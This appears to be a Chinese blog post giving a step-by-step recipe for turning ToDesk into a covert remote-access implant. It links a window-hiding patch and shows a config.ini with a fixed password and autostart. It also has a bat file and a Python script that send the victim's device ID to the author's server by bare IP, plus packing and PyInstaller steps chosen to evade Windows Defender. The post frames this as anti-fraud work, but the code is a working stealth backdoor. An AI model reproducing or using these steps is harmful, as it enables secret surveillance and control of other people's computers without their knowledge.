最近协助某反诈中心工作,需要进行监控某团伙(静默安装todesk+远程控制,而且远程连接不能被对方发现)。

步骤是首先安装一个官方版本,然后修改密码相关配置和替换Todesk_service来隐藏主界面,然后通过python来执行一个bat获取id,然后回传id给我服务器。为什么要执行一次bat呢,因为在python执行几次命令编译exe会被windows defender查杀,所以直接调用bat来执行。

ToDesk 4.1.1

# 隐藏主界面窗口补丁
https://github.com/liuzhijie443/todesk-silently
https://ldz2020.lanzoui.com/b00uzyach

# 这个补丁在4.2.8版本下也可以隐藏窗口正常运行

此时通过安装todesk4.1.1的官方版后,然后修改下config.ini,去掉clientId,把Logs等相关目录去掉,打包程序自解压。

[ConfigInfo]
screen_img=
localPort=35600
language=936
Version=4.1.1
updatePassTime=20220822
Resolution=2966x1610
LastPushTimeEx=20220822
AuthMode=1
autoStart=1
authPassEx=xxxxxxxxx
PrivateData=xxxxxxxxx

以上参数authPassEx是安全密码,autoStart是开机启动,AuthMode是安全密码登陆,PrivateData是验证信息,PrivateData在程序每次启动都会变,authPassEx可以固定。

自解压可以选择自解压目录和隐藏窗口运行还有覆盖文件,这样不会windows defender查杀,如果加了解压后自动运行会被windows defender杀。

Pyinstaller

用于用的是隐藏窗口补丁,替换了原本的todesk_service.exe,更改密码的命令执行和其他命令会提示error,所以只能把密码写进配置文件,然后通过python来执行bat,bat是获取id的,然后把id回传到我的服务器网站里,我直接连接他们的id就可以了

@echo off
ToDesk.exe
for /f "delims=" %%i in ('"C:/Program Files (x86)/todesk/ToDesk.exe" -getid') do echo %%i

import requests,os
os.chdir("C:/Program Files (x86)/todesk/")
b_ = os.popen("C:/Program Files (x86)/todesk/1.bat").read()
a = requests.get('http://xxx.xxx.xxx.xxx/xx.php?xx='+str(b_))

这里如果直接请求域名的话会被windows defender查杀,所以为了方便直接用ip。

pyinstaller --key=4564654asdasd -F code.py --clean

最后实战中在win7/win10都正常执行